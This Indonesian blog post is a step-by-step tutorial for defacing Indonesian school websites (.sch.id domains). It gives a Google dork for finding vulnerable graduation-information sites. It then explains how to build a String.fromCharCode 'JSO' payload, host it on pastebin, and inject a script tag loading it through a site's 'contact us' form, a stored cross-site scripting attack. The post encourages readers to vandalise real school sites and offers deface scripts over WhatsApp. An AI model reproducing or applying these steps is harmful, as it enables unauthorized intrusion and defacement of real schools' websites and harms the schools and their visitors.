Cara deface web sekolah sch.id

Berbagi
byPosted at

 



Dinamakan web sekolah karena nama domain atau linknya berakhiran .sch.id, contoh sman1bandung.sch.id.


Tidak semua website sekolah dapat dideface, tetapi hanya web yang memiliki celah saja. Untuk menemukan celahnya kalian bisa menggunakan bantuan aplikasi termux.

Sebelum melakukan deface, buat dulu script deface untuk menampilkan pesan atau nama underground/hacker kalian. Contoh, hack by fronn eror system dll.


Script deface bisa kalian download di google atau minta ke saya melalui WhatsApp


Bagi yang sudah mempunyai script defacenya, sekarang tinggal memilih metode deface dibawah ini.


1. Deface web sekolah jso

Intinya, kalian harus meng-upload script jso ke web sekolah yang berstatus vuln. Cara upload bisa dari halaman pendaftaran atau sejenisnya.


Untuk menemukan halaman pendaftaran, bisa menggunakan query google dork berikut:


intext:”sistem informasi kelulusan” site:sch.id


Kemudian pilih salah satu website yang muncul di hasil pencarian google.


Setelah masuk ke situs yang dipilih, cari menu hubungi kami. Kemudian upload script Jso kalian, kalau belum punya buat dulu dengan mengikuti tutorial dibawah.


a. Cara membuat script jso

Untuk membuat script jso, kalian dapat menggunakan tools jso generator. Linknya ada dibawah.


https://apaa.or.id/jso.php


Berikut penggunaannya:


Pada tampilan awal situs jso generator, masukkan semua kode html dari script deface kalian.

Kemudian copy semua angka yang muncul dibagian hasil.

Tambahkan kode document.documentElement.innerHTML=String.fromCharCode(kode angka jso).

Paste semua kode di situs pastebin.com kemudian pilih create new paste.

Tekan menu raw untuk menyalin link script jso yang sudah jadi.

Script jso adalah script deface yang diubah agar dapat menembus kerentanan website. Setelah berhasil membuatnya, lanjut ke proses upload.


b. Cara upload script jso ke website target

Pada kolom pengisian, isi saja data asal. Tetapi pada kolom pesan, masukkan script jso kalian dengan menambah kode berikut:


<script type=”text/javascript” src=”link raw pastebin”></script>)


Contoh:


<script type="text/javascript" src="https://pastebin.com/raw/sQTdf7cv"></script>)

Selanjutnya tekan kirim.


Apabila proses pengiriman berhasil, maka tandanya web sekolah tersebut sudah berhasil dideface.


Untuk mengetahui hasilnya, akses alamat situs ditambah admin/hubungi.php. Contoh: sman1bandung.sch.id/admin/hubungi.php

Posting Komentar
Labels

Komentar

Send Message

Kirim